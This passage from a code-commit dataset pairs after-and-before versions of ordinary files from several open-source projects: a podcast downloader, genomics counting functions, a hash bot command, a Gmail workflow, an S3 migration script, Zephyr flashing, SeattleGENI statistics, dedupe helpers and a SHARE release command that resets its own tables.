if 'type' in link and 'href' in link:
if 'audio' in link['type']:
dload(link['href'])
return
print 'Err: no media found'
if __name__ == '__main__':
statics = ['http://wsdownload.bbc.co.uk/worldservice/css/32mp3/latest/bbcnewssummary.mp3']
feeds = ['http://www.nhk.or.jp/rj/podcast/rss/english.xml',
'http://www.cbc.ca/podcasting/includes/wr.xml',
'http://www.npr.org/rss/podcast.php?id=500005']
for feed in feeds:
get_latest(feed)
for static in statics:
dload(static)
| unlicense | Python |
5bb46586a6bb87ad732310b81a9e14ef388e6711 | return 0 for patients with neoantigens | hammerlab/cohorts,hammerlab/cohorts | cohorts/functions.py | cohorts/functions.py | # Copyright (c) 2016. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import numpy as np
import pandas as pd
from varcode import EffectCollection
from varcode.effects import Substitution
def snv_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_variants = cohort.load_variants(
patients=[cohort.patient_from_id(patient_id)], **kwargs)
if patient_id in patient_variants:
return len(patient_variants[patient_id])
return np.nan
def nonsynonymous_snv_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_nonsynonymous_effects = cohort.load_effects(
only_nonsynonymous=True, patients=[cohort.patient_from_id(patient_id)], **kwargs)
if patient_id in patient_nonsynonymous_effects:
return len(patient_nonsynonymous_effects[patient_id])
return np.nan
def missense_snv_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_missense_effects = cohort.load_effects(
only_nonsynonymous=True,
patients=[cohort.patient_from_id(patient_id)],
filter_fn=lambda effect, variant_metadata: type(effect) == Substitution,
**kwargs)
if patient_id in patient_missense_effects:
return len(patient_missense_effects[patient_id])
return np.nan
def neoantigen_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_neoantigens = cohort.load_neoantigens(patients=[cohort.patient_from_id(patient_id)], **kwargs)
return len(patient_neoantigens[patient_neoantigens["patient_id"] == patient_id])
def expressed_neoantigen_count(row, cohort, **kwargs):
return neoantigen_count(row, cohort, only_expressed=True)
| # Copyright (c) 2016. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import numpy as np
import pandas as pd
from varcode import EffectCollection
from varcode.effects import Substitution
def snv_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_variants = cohort.load_variants(
patients=[cohort.patient_from_id(patient_id)], **kwargs)
if patient_id in patient_variants:
return len(patient_variants[patient_id])
return np.nan
def nonsynonymous_snv_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_nonsynonymous_effects = cohort.load_effects(
only_nonsynonymous=True, patients=[cohort.patient_from_id(patient_id)], **kwargs)
if patient_id in patient_nonsynonymous_effects:
return len(patient_nonsynonymous_effects[patient_id])
return np.nan
def missense_snv_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_missense_effects = cohort.load_effects(
only_nonsynonymous=True,
patients=[cohort.patient_from_id(patient_id)],
filter_fn=lambda effect, variant_metadata: type(effect) == Substitution,
**kwargs)
if patient_id in patient_missense_effects:
return len(patient_missense_effects[patient_id])
return np.nan
def neoantigen_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_neoantigens = cohort.load_neoantigens(patients=[cohort.patient_from_id(patient_id)], **kwargs)
if patient_id in patient_neoantigens["patient_id"].unique():
return len(patient_neoantigens[patient_neoantigens["patient_id"] == patient_id])
return np.nan
def expressed_neoantigen_count(row, cohort, **kwargs):
return neoantigen_count(row, cohort, only_expressed=True)
| apache-2.0 | Python |
f9e1dd68d5f57f75da73e6d3cf4b18d815de4c2f | Remove clutter from available_algorithms | TheReverend403/Pyper,TheReverend403/Pyper | commands/cmd_hash.py | commands/cmd_hash.py | import hashlib
from lib.command import Command
class HashCommand(Command):
name = 'hash'
description = 'Hashes text.'
def run(self, message, args):
# Remove duplicates
available_algorithms = hashlib.algorithms_guaranteed
if not args or len(args) < 2:
self.reply(message, '<b>/{0} [algorithm] [text]</b>, where <b>[algorithm]</b> is one of {1}'.format(
self.name, ', '.join(available_algorithms)), parse_mode='HTML')
return
algorithm = args[0].lower()
if algorithm not in available_algorithms:
self.reply(message, 'Invalid algorithm. Please choose one of {0}'.format(', '.join(available_algorithms)))
return
text = ' '.join(args[1:]).encode('utf-8')
hash_object = hashlib.new(algorithm)
hash_object.update(text)
self.reply(message, hash_object.hexdigest())
| import hashlib
from lib.command import Command
class HashCommand(Command):
name = 'hash'
description = 'Hashes text.'
def run(self, message, args):
# Remove duplicates
available_algorithms = list(set(x.lower() for x in hashlib.algorithms_available))
if not args or len(args) < 2:
self.reply(message, '<b>/{0} [algorithm] [text]</b>, where <b>[algorithm]</b> is one of {1}'.format(
self.name, ', '.join(available_algorithms)), parse_mode='HTML')
return
algorithm = args[0].lower()
if algorithm not in [x for x in available_algorithms]:
self.reply(message, 'Invalid algorithm. Please choose one of {0}'.format(
', '.join(available_algorithms)))
return
text = ' '.join(args[1:]).encode('utf-8')
hash_object = hashlib.new(algorithm)
hash_object.update(text)
self.reply(message, hash_object.hexdigest())
| agpl-3.0 | Python |
99115b69871033c08b4fb88b55960ec03e5bb353 | Fix filter problems | fniephaus/alfred-gmail | src/gmail.py | src/gmail.py | import datetime
import sys
from gmail_refresh import refresh_cache
from workflow import Workflow, PasswordNotFound, MATCH_SUBSTRING
from workflow.background import run_in_background, is_running
def main(wf):
if len(wf.args):
query = wf.args[0]
else:
query = None
if not wf.cached_data_fresh('gmail_list', max_age=3600):
refresh_cache()
item_list = wf.cached_data('gmail_list', None, max_age=0)
if item_list is not None:
if len(item_list) == 0:
wf.add_item('Your Gmail inbox is empty!', valid=False)
else:
for index, item in enumerate(item_list):
name = item['From'][
:item['From'].find("<") - 1].replace('"', '')
title = '%s: %s' % (name, item['Subject'])
subtitle = '%s - %s' % (item['Date'][:-6], item['snippet'])
arg = '%s %s' % (item['thread_id'], item['id'])
if not query or query.lower() in ' '.join([title, subtitle]).lower():
wf.add_item(title, subtitle, arg=arg, valid=True)
else:
wf.add_item("Could receive your emails.",
"Please try again or file a bug report!", valid=False)
# Update list in background
if not wf.cached_data_fresh('gmail_list', max_age=30):
background_refresh(wf)
wf.send_feedback()
def background_refresh(wf):
if not is_running('gmail_refresh'):
cmd = ['/usr/bin/python', wf.workflowfile('gmail_refresh.py')]
run_in_background('gmail_refresh', cmd)
if __name__ == '__main__':
wf = Workflow()
sys.exit(wf.run(main))
| import datetime
import sys
from gmail_refresh import refresh_cache
from workflow import Workflow, PasswordNotFound, MATCH_SUBSTRING
from workflow.background import run_in_background, is_running
def search_key_for_mail(mail):
elements = []
elements.append(mail['From'])
elements.append(mail['snippet'])
elements.append(mail['Subject'])
elements.append(mail['Date'])
return u' '.join(elements)
def main(wf):
if len(wf.args):
query = wf.args[0]
else:
query = None
if not wf.cached_data_fresh('gmail_list', max_age=3600):
refresh_cache()
item_list = wf.cached_data('gmail_list', None, max_age=0)
if item_list is not None:
if len(item_list) == 0:
wf.add_item('Your Gmail inbox is empty!', valid=False)
else:
if query:
item_list = wf.filter(
query, item_list, key=search_key_for_mail, match_on=MATCH_SUBSTRING)
for index, item in enumerate(item_list):
name = item['From'][
:item['From'].find("<") - 1].replace('"', '')
title = '%s: %s' % (name, item['Subject'])
subtitle = '%s - %s' % (item['Date'][:-6], item['snippet'])
arg = '%s %s' % (item['thread_id'], item['id'])
wf.add_item(title, subtitle, arg=arg, valid=True)
else:
wf.add_item("Could receive your emails.",
"Please try again or file a bug report!", valid=False)
# Update list in background
if not wf.cached_data_fresh('gmail_list', max_age=30):
background_refresh(wf)
wf.send_feedback()
def background_refresh(wf):
if not is_running('gmail_refresh'):
cmd = ['/usr/bin/python', wf.workflowfile('gmail_refresh.py')]
run_in_background('gmail_refresh', cmd)
if __name__ == '__main__':
wf = Workflow()
sys.exit(wf.run(main))
| mit | Python |
9faf52229e96000c2dbb79f2f4a1964751283b83 | upgrade version | DataCanvasIO/pyDataCanvas | datacanvas/version.py | datacanvas/version.py | version = "0.5.0"
| version = "0.4.9"
| apache-2.0 | Python |
6cfcf5ea2c4f1f53b7aa40ab503cd21392f444d1 | bump hotfix version to 1.0.1 | emory-libraries/ddi-search,emory-libraries/ddi-search | ddisearch/__init__.py | ddisearch/__init__.py | # file ddisearch/__init__.py
#
# Copyright 2014 Emory University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
Django website for search and display access to DDI XML descriptions
of research datasets such as those provided by the ICPSR. Uses
eXist-db for powerful full text searching.
'''
__version_info__ = (1, 0, 1, None)
# Dot-connect all but the last. Last is dash-connected if not None.
__version__ = '.'.join(str(i) for i in __version_info__[:-1])
if __version_info__[-1] is not None:
__version__ += ('-%s' % (__version_info__[-1],))
| # file ddisearch/__init__.py
#
# Copyright 2014 Emory University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
Django website for search and display access to DDI XML descriptions
of research datasets such as those provided by the ICPSR. Uses
eXist-db for powerful full text searching.
'''
__version_info__ = (1, 0, 0, None)
# Dot-connect all but the last. Last is dash-connected if not None.
__version__ = '.'.join(str(i) for i in __version_info__[:-1])
if __version_info__[-1] is not None:
__version__ += ('-%s' % (__version_info__[-1],))
| apache-2.0 | Python |
5dcd279434d0ab87409c699b9ed6f594ffdb61f5 | Update script to get location -add rate limiting -add bucket location caching | samchrisinger/osf.io,Johnetordoff/osf.io,DanielSBrown/osf.io,brianjgeiger/osf.io,mluo613/osf.io,DanielSBrown/osf.io,chrisseto/osf.io,felliott/osf.io,hmoco/osf.io,monikagrabowska/osf.io,adlius/osf.io,Nesiehr/osf.io,leb2dg/osf.io,alexschiller/osf.io,pattisdr/osf.io,amyshi188/osf.io,erinspace/osf.io,TomBaxter/osf.io,Johnetordoff/osf.io,pattisdr/osf.io,HalcyonChimera/osf.io,cwisecarver/osf.io,felliott/osf.io,hmoco/osf.io,wearpants/osf.io,monikagrabowska/osf.io,TomBaxter/osf.io,sloria/osf.io,icereval/osf.io,leb2dg/osf.io,caneruguz/osf.io,caseyrollins/osf.io,rdhyee/osf.io,alexschiller/osf.io,crcresearch/osf.io,baylee-d/osf.io,saradbowman/osf.io,Nesiehr/osf.io,sloria/osf.io,mattclark/osf.io,emetsger/osf.io,crcresearch/osf.io,laurenrevere/osf.io,icereval/osf.io,baylee-d/osf.io,DanielSBrown/osf.io,mluo613/osf.io,chennan47/osf.io,acshi/osf.io,leb2dg/osf.io,brianjgeiger/osf.io,samchrisinger/osf.io,monikagrabowska/osf.io,laurenrevere/osf.io,chennan47/osf.io,erinspace/osf.io,acshi/osf.io,hmoco/osf.io,cwisecarver/osf.io,binoculars/osf.io,pattisdr/osf.io,chennan47/osf.io,wearpants/osf.io,Nesiehr/osf.io,chrisseto/osf.io,aaxelb/osf.io,mluo613/osf.io,samchrisinger/osf.io,felliott/osf.io,mfraezz/osf.io,monikagrabowska/osf.io,Johnetordoff/osf.io,samchrisinger/osf.io,baylee-d/osf.io,amyshi188/osf.io,rdhyee/osf.io,binoculars/osf.io,mfraezz/osf.io,laurenrevere/osf.io,mluo613/osf.io,mfraezz/osf.io,adlius/osf.io,HalcyonChimera/osf.io,mattclark/osf.io,icereval/osf.io,chrisseto/osf.io,chrisseto/osf.io,adlius/osf.io,CenterForOpenScience/osf.io,aaxelb/osf.io,caseyrollins/osf.io,saradbowman/osf.io,TomBaxter/osf.io,CenterForOpenScience/osf.io,crcresearch/osf.io,emetsger/osf.io,acshi/osf.io,adlius/osf.io,leb2dg/osf.io,mfraezz/osf.io,cwisecarver/osf.io,caneruguz/osf.io,hmoco/osf.io,SSJohns/osf.io,CenterForOpenScience/osf.io,Nesiehr/osf.io,brianjgeiger/osf.io,cslzchen/osf.io,mon
ikagrabowska/osf.io,DanielSBrown/osf.io,binoculars/osf.io,cwisecarver/osf.io,wearpants/osf.io,aaxelb/osf.io,caseyrollins/osf.io,rdhyee/osf.io,amyshi188/osf.io,emetsger/osf.io,cslzchen/osf.io,cslzchen/osf.io,aaxelb/osf.io,alexschiller/osf.io,caneruguz/osf.io,emetsger/osf.io,acshi/osf.io,mluo613/osf.io,wearpants/osf.io,SSJohns/osf.io,erinspace/osf.io,amyshi188/osf.io,SSJohns/osf.io,alexschiller/osf.io,Johnetordoff/osf.io,alexschiller/osf.io,HalcyonChimera/osf.io,caneruguz/osf.io,mattclark/osf.io,sloria/osf.io,HalcyonChimera/osf.io,brianjgeiger/osf.io,cslzchen/osf.io,acshi/osf.io,CenterForOpenScience/osf.io,SSJohns/osf.io,rdhyee/osf.io,felliott/osf.io | scripts/s3/migrate_folder_language.py | scripts/s3/migrate_folder_language.py | import logging
import sys
import time
from modularodm import Q
from framework.mongo import database
from framework.transactions.context import TokuTransaction
from website.app import init_app
from website.addons.base.exceptions import InvalidAuthError, InvalidFolderError
from website.addons.s3.utils import get_bucket_location_or_error
from website.addons.s3.settings import BUCKET_LOCATIONS
from website.addons.s3.model import S3NodeSettings
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
def migrate(dry_run=False):
bucket_name_location_map = {}
sns_collection = database['s3nodesettings']
logger.info('Migrating all {} S3NodeSettings documents: {}'.format(
sns_collection.count(), [s['_id'] for s in sns_collection.find()]
))
for document in sns_collection.find():
sns_collection.find_and_modify(
{'_id': document['_id']},
{
'$set': {'folder_id': document['bucket']},
'$unset': {'bucket': ''}
}
)
allowance = 2
last_call = time.time()
for node_settings in S3NodeSettings.find(Q('folder_id', 'ne', None)):
if node_settings.folder_id in bucket_name_location_map:
# See if this bucket is cached
node_settings.folder_name = '{} ({})'.format(
node_settings.folder_id,
bucket_name_location_map[node_settings.folder_id]
)
else:
# Attempt to determine bucket location, default to just bucket name.
node_settings.folder_name = node_settings.folder_id
if allowance < 1:
try:
time.sleep(1 - (time.time() - last_call))
except (ValueError, IOError):
pass # ValueError/IOError indicates a negative sleep time
allowance = 2
allowance -= 1
last_call = time.time()
try:
bucket_location = get_bucket_location_or_error(
node_settings.external_account.oauth_key,
node_settings.external_account.oauth_secret,
node_settings.folder_id
)
except InvalidAuthError:
logger.info('Found S3NodeSettings {} with invalid credentials.'.format(node_settings._id))
except InvalidFolderError:
logger.info('Found S3NodeSettings {} with invalid bucket linked.'.format(node_settings._id))
except Exception as e:
logger.info('Found S3NodeSettings {} throwing unknown error. Likely configured improperly; with a bucket but no credentials'.format(node_settings._id))
logger.exception(e)
else:
try:
bucket_location = BUCKET_LOCATIONS[bucket_location]
except KeyError:
# Unlisted location, S3 may have added it recently.
# Default to the key. When hit, add mapping to settings
logger.info('Found unknown location key: {}'.format(bucket_location))
node_settings.folder_name = '{} ({})'.format(node_settings.folder_id, bucket_location)
bucket_name_location_map[node_settings.folder_id] = bucket_location
node_settings.save()
if dry_run:
raise RuntimeError('Dry run, transaction rolled back.')
def main():
dry_run = False
if '--dry' in sys.argv:
dry_run = True
if not dry_run:
script_utils.add_file_logger(logger, __file__)
init_app(set_backends=True, routes=False)
with TokuTransaction():
migrate(dry_run=dry_run)
if __name__ == "__main__":
main()
| import logging
import sys
from modularodm import Q
from framework.mongo import database
from framework.transactions.context import TokuTransaction
from website.app import init_app
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
def migrate(dry_run=False):
sns_collection = database['s3nodesettings']
logger.info('Migrating all {} S3NodeSettings documents: {}'.format(
sns_collection.count(), [s['_id'] for s in sns_collection.find()]
))
sns_collection.find_and_modify(
{},
{'$rename': {'bucket': 'folder_id'}
})
# TODO: update folder_name with bucket location
if dry_run:
raise RuntimeError('Dry run, transaction rolled back.')
def main():
dry_run = False
if '--dry' in sys.argv:
dry_run = True
if not dry_run:
script_utils.add_file_logger(logger, __file__)
init_app(set_backends=True, routes=False)
with TokuTransaction():
migrate(dry_run=dry_run)
if __name__ == "__main__":
main()
| apache-2.0 | Python |
934a8cb077c733542f01da2312c3084559c2271c | remove obsolete KBUILD_VERBOSE | galak/zephyr,punitvara/zephyr,explora26/zephyr,zephyriot/zephyr,zephyrproject-rtos/zephyr,kraj/zephyr,Vudentz/zephyr,mbolivar/zephyr,aceofall/zephyr-iotos,explora26/zephyr,ldts/zephyr,GiulianoFranchetto/zephyr,punitvara/zephyr,mbolivar/zephyr,GiulianoFranchetto/zephyr,zephyriot/zephyr,finikorg/zephyr,Vudentz/zephyr,zephyrproject-rtos/zephyr,ldts/zephyr,zephyrproject-rtos/zephyr,kraj/zephyr,kraj/zephyr,nashif/zephyr,GiulianoFranchetto/zephyr,kraj/zephyr,Vudentz/zephyr,explora26/zephyr,aceofall/zephyr-iotos,aceofall/zephyr-iotos,zephyrproject-rtos/zephyr,galak/zephyr,nashif/zephyr,kraj/zephyr,GiulianoFranchetto/zephyr,ldts/zephyr,finikorg/zephyr,galak/zephyr,galak/zephyr,zephyriot/zephyr,Vudentz/zephyr,finikorg/zephyr,punitvara/zephyr,zephyriot/zephyr,nashif/zephyr,zephyriot/zephyr,ldts/zephyr,finikorg/zephyr,aceofall/zephyr-iotos,aceofall/zephyr-iotos,mbolivar/zephyr,finikorg/zephyr,ldts/zephyr,punitvara/zephyr,nashif/zephyr,zephyrproject-rtos/zephyr,galak/zephyr,mbolivar/zephyr,Vudentz/zephyr,explora26/zephyr,GiulianoFranchetto/zephyr,nashif/zephyr,mbolivar/zephyr,Vudentz/zephyr,punitvara/zephyr,explora26/zephyr | scripts/support/zephyr_flash_debug.py | scripts/support/zephyr_flash_debug.py | #! /usr/bin/env python3
# Copyright (c) 2017 Linaro Limited.
#
# SPDX-License-Identifier: Apache-2.0
"""Zephyr flash/debug script
This script is a transparent replacement for legacy Zephyr flash and
debug scripts which have now been removed. It will be refactored over
time as the rest of the build system is taught to use it.
"""
from os import path
import sys
from runner.core import ZephyrBinaryRunner, get_env_bool_or
# TODO: Stop using environment variables.
#
# Migrate the build system so we can use an argparse.ArgumentParser and
# per-flasher subparsers, so invoking the script becomes something like:
#
# python zephyr_flash_debug.py openocd --openocd-bin=/openocd/path ...
#
# For now, maintain compatibility.
def run(shell_script_full, command, debug):
shell_script = path.basename(shell_script_full)
try:
runner = ZephyrBinaryRunner.create_for_shell_script(shell_script,
command,
debug)
except ValueError:
print('Unrecognized shell script {}'.format(shell_script_full),
file=sys.stderr)
raise
runner.run(command)
if __name__ == '__main__':
commands = {'flash', 'debug', 'debugserver'}
debug = True
try:
debug = get_env_bool_or('VERBOSE', False)
if len(sys.argv) != 3 or sys.argv[1] not in commands:
raise ValueError('usage: {} <{}> path-to-script'.format(
sys.argv[0], '|'.join(commands)))
run(sys.argv[2], sys.argv[1], debug)
except Exception as e:
if debug:
raise
else:
print('Error: {}'.format(e), file=sys.stderr)
print('Re-run with VERBOSE=1 for a stack trace.',
file=sys.stderr)
sys.exit(1)
| #! /usr/bin/env python3
# Copyright (c) 2017 Linaro Limited.
#
# SPDX-License-Identifier: Apache-2.0
"""Zephyr flash/debug script
This script is a transparent replacement for legacy Zephyr flash and
debug scripts which have now been removed. It will be refactored over
time as the rest of the build system is taught to use it.
"""
from os import path
import sys
from runner.core import ZephyrBinaryRunner, get_env_bool_or
# TODO: Stop using environment variables.
#
# Migrate the build system so we can use an argparse.ArgumentParser and
# per-flasher subparsers, so invoking the script becomes something like:
#
# python zephyr_flash_debug.py openocd --openocd-bin=/openocd/path ...
#
# For now, maintain compatibility.
def run(shell_script_full, command, debug):
shell_script = path.basename(shell_script_full)
try:
runner = ZephyrBinaryRunner.create_for_shell_script(shell_script,
command,
debug)
except ValueError:
print('Unrecognized shell script {}'.format(shell_script_full),
file=sys.stderr)
raise
runner.run(command)
if __name__ == '__main__':
commands = {'flash', 'debug', 'debugserver'}
debug = True
try:
debug = get_env_bool_or('KBUILD_VERBOSE', False)
if len(sys.argv) != 3 or sys.argv[1] not in commands:
raise ValueError('usage: {} <{}> path-to-script'.format(
sys.argv[0], '|'.join(commands)))
run(sys.argv[2], sys.argv[1], debug)
except Exception as e:
if debug:
raise
else:
print('Error: {}'.format(e), file=sys.stderr)
print('Re-run with KBUILD_VERBOSE=1 for a stack trace.',
file=sys.stderr)
sys.exit(1)
| apache-2.0 | Python |
952841ab7df91533b03fe590fd8f4d88a35f1441 | Fix a copy-and-paste bug in the seattlegeni statistics module just added. | sburnett/seattle,sburnett/seattle,sburnett/seattle,sburnett/seattle,sburnett/seattle,sburnett/seattle | seattlegeni/common/util/statistics.py | seattlegeni/common/util/statistics.py | """
Provides information about the data in the database. This is for generating
reports, not for any core functionality of seattlegeni.
Some of the functions in the module are very database intensive. They could
be done more efficiently, but where possible this module tries to use the
maindb api so that summarized information matches how seattlegeni actually
sees things.
"""
from seattlegeni.common.api import maindb
from seattlegeni.website.control.models import GeniUser
from seattlegeni.common.util import log
def get_vessel_acquisition_counts_by_user():
# Set the log level high enough so that we don't produce a bunch of logging
# output due to the logging decorators.
initial_log_level = log.loglevel
log.set_log_level(log.LOG_LEVEL_INFO)
vessel_acquisition_dict = {}
for user in GeniUser.objects.all():
acquired_vessels = maindb.get_acquired_vessels(user)
if len(acquired_vessels) > 0:
vessel_acquisition_dict[user.username] = len(acquired_vessels)
# Restore the original log level.
log.set_log_level(initial_log_level)
return vessel_acquisition_dict
def get_donation_counts_by_user():
# Set the log level high enough so that we don't produce a bunch of logging
# output due to the logging decorators.
initial_log_level = log.loglevel
log.set_log_level(log.LOG_LEVEL_INFO)
donation_dict = {}
for user in GeniUser.objects.all():
active_donation_count = len(maindb.get_donations_by_user(user))
inactive_donation_count = len(maindb.get_donations_by_user(user, include_inactive_and_broken=True)) - active_donation_count
if active_donation_count > 0 or inactive_donation_count > 0:
donation_dict[user.username] = (active_donation_count, inactive_donation_count)
# Restore the original log level.
log.set_log_level(initial_log_level)
return donation_dict
def get_available_vessel_counts_by_port():
# Set the log level high enough so that we don't produce a bunch of logging
# output due to the logging decorators.
initial_log_level = log.loglevel
log.set_log_level(log.LOG_LEVEL_INFO)
available_vessels_dict = {}
for port in maindb.ALLOWED_USER_PORTS:
available_vessels_dict[port] = {}
available_vessels_dict[port]["all"] = maindb._get_queryset_of_all_available_vessels_for_a_port_include_nat_nodes(port).count()
available_vessels_dict[port]["no_nat"] = maindb._get_queryset_of_all_available_vessels_for_a_port_exclude_nat_nodes(port).count()
available_vessels_dict[port]["only_nat"] = maindb._get_queryset_of_all_available_vessels_for_a_port_only_nat_nodes(port).count()
# Restore the original log level.
log.set_log_level(initial_log_level)
return available_vessels_dict
| """
Provides information about the data in the database. This is for generating
reports, not for any core functionality of seattlegeni.
Some of the functions in the module are very database intensive. They could
be done more efficiently, but where possible this module tries to use the
maindb api so that summarized information matches how seattlegeni actually
sees things.
"""
from seattlegeni.common.api import maindb
from seattlegeni.website.control.models import GeniUser
from seattlegeni.common.util import log
def get_vessel_acquisition_counts_by_user():
# Set the log level high enough so that we don't produce a bunch of logging
# output due to the logging decorators.
initial_log_level = log.loglevel
log.set_log_level(log.LOG_LEVEL_INFO)
vessel_acquisition_dict = {}
for user in GeniUser.objects.all():
acquired_vessels = maindb.get_acquired_vessels(user)
if len(acquired_vessels) > 0:
vessel_acquisition_dict[user.username] = len(acquired_vessels)
# Restore the original log level.
log.set_log_level(initial_log_level)
return vessel_acquisition_dict
def get_donation_counts_by_user():
# Set the log level high enough so that we don't produce a bunch of logging
# output due to the logging decorators.
initial_log_level = log.loglevel
log.set_log_level(log.LOG_LEVEL_INFO)
donation_dict = {}
for user in GeniUser.objects.all():
active_donation_count = len(maindb.get_donations_by_user(user))
inactive_donation_count = len(maindb.get_donations_by_user(user, include_inactive_and_broken=True)) - active_donation_count
if active_donation_count > 0 or inactive_donation_count > 0:
donation_dict[user.username] = (active_donation_count, inactive_donation_count)
# Restore the original log level.
log.set_log_level(initial_log_level)
return donation_dict
def get_available_vessel_counts_by_port():
# Set the log level high enough so that we don't produce a bunch of logging
# output due to the logging decorators.
initial_log_level = log.loglevel
log.set_log_level(log.LOG_LEVEL_INFO)
available_vessels_dict = {}
for port in maindb.ALLOWED_USER_PORTS:
available_vessels_dict[port] = {}
available_vessels_dict[port]["all"] = maindb._get_queryset_of_all_available_vessels_for_a_port_include_nat_nodes(port).count()
available_vessels_dict[port]["no_nat"] = maindb._get_queryset_of_all_available_vessels_for_a_port_include_nat_nodes(port).count()
available_vessels_dict[port]["only_nat"] = maindb._get_queryset_of_all_available_vessels_for_a_port_only_nat_nodes(port).count()
# Restore the original log level.
log.set_log_level(initial_log_level)
return available_vessels_dict
| mit | Python |
091d2f91402e2ce52a2a07b88c74ae722cf1b19c | Add the first element of data_list at the end again, as the probablity of it beign selected was zero | pombredanne/dedupe,tfmorris/dedupe,neozhangthe1/dedupe,tfmorris/dedupe,dedupeio/dedupe,davidkunio/dedupe,pombredanne/dedupe,01-/dedupe,dedupeio/dedupe-examples,datamade/dedupe,davidkunio/dedupe,dedupeio/dedupe,datamade/dedupe,neozhangthe1/dedupe,01-/dedupe,nmiranda/dedupe,nmiranda/dedupe | dedupe/convenience.py | dedupe/convenience.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Convenience functions for in memory deduplication
"""
import collections
import dedupe.core
def dataSample(data, sample_size, constrained_matching=False):
'''Randomly sample pairs of records from a data dictionary'''
data_list = data.values()
if constrained_matching:
data_list_A = []
data_list_B = []
for record in data_list:
if record['dataset'] == 0:
data_list_A.append(record)
else:
data_list_B.append(record)
data_list_A.append(data_list_A[0])
data_list_B.append(data_list_B[0])
n_records = min(len(data_list_A), len(data_list_B))
random_pairs = dedupe.core.randomPairs(n_records, sample_size)
return tuple((data_list_A[int(k1)], data_list_B[int(k2)]) for k1, k2 in random_pairs)
else:
random_pairs = dedupe.core.randomPairs(len(data_list), sample_size)
return tuple((data_list[int(k1)], data_list[int(k2)]) for k1, k2 in random_pairs)
def blockData(data_d, blocker, constrained_matching=False):
blocks = dedupe.core.OrderedDict({})
record_blocks = dedupe.core.OrderedDict({})
key_blocks = dedupe.core.OrderedDict({})
blocker.tfIdfBlocks(data_d.iteritems(), constrained_matching)
for (record_id, record) in data_d.iteritems():
for key in blocker((record_id, record)):
blocks.setdefault(key, {}).update({record_id : record})
blocked_records = tuple(block for block in blocks.values())
return blocked_records
| #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Convenience functions for in memory deduplication
"""
import collections
import dedupe.core
def dataSample(data, sample_size, constrained_matching=False):
'''Randomly sample pairs of records from a data dictionary'''
data_list = data.values()
if constrained_matching:
data_list_A = []
data_list_B = []
for record in data_list:
if record['dataset'] == 0:
data_list_A.append(record)
else:
data_list_B.append(record)
n_records = min(len(data_list_A), len(data_list_B))
random_pairs = dedupe.core.randomPairs(n_records, sample_size)
return tuple((data_list_A[int(k1)], data_list_B[int(k2)]) for k1, k2 in random_pairs)
else:
random_pairs = dedupe.core.randomPairs(len(data_list), sample_size)
return tuple((data_list[int(k1)], data_list[int(k2)]) for k1, k2 in random_pairs)
def blockData(data_d, blocker, constrained_matching=False):
blocks = dedupe.core.OrderedDict({})
record_blocks = dedupe.core.OrderedDict({})
key_blocks = dedupe.core.OrderedDict({})
blocker.tfIdfBlocks(data_d.iteritems(), constrained_matching)
for (record_id, record) in data_d.iteritems():
for key in blocker((record_id, record)):
blocks.setdefault(key, {}).update({record_id : record})
blocked_records = tuple(block for block in blocks.values())
return blocked_records
| mit | Python |
d2ba774814546f821ba967c95f0ecff8b7f4a596 | Correct release2 command | zamattiac/SHARE,zamattiac/SHARE,CenterForOpenScience/SHARE,CenterForOpenScience/SHARE,CenterForOpenScience/SHARE,laurenbarker/SHARE,aaxelb/SHARE,aaxelb/SHARE,laurenbarker/SHARE,aaxelb/SHARE,zamattiac/SHARE,laurenbarker/SHARE | share/management/commands/release2.py | share/management/commands/release2.py | from django.core.management.base import BaseCommand
from django.db import connection
from django.db import transaction
class Command(BaseCommand):
def handle(self, *args, **options):
with transaction.atomic():
with connection.cursor() as c:
c.execute('''
DO $$
DECLARE
tname TEXT;
keep TEXT [] = ARRAY ['share_rawdata', 'share_shareuser', 'share_providerregistration'];
BEGIN
FOR tname IN (SELECT table_name
FROM information_schema.tables
WHERE table_schema = 'public' AND NOT (table_name = ANY (keep))
AND table_name LIKE 'share_%'
AND NOT table_name LIKE 'share_shareuser%'
)
LOOP
RAISE NOTICE 'DROP TABLE % CASCADE', tname;
EXECUTE 'DROP TABLE ' || tname || ' CASCADE';
END LOOP;
END;
$$;
''')
c.execute("DELETE FROM django_migrations WHERE app = 'share';")
| from django.core.management.base import BaseCommand
from django.db import connection
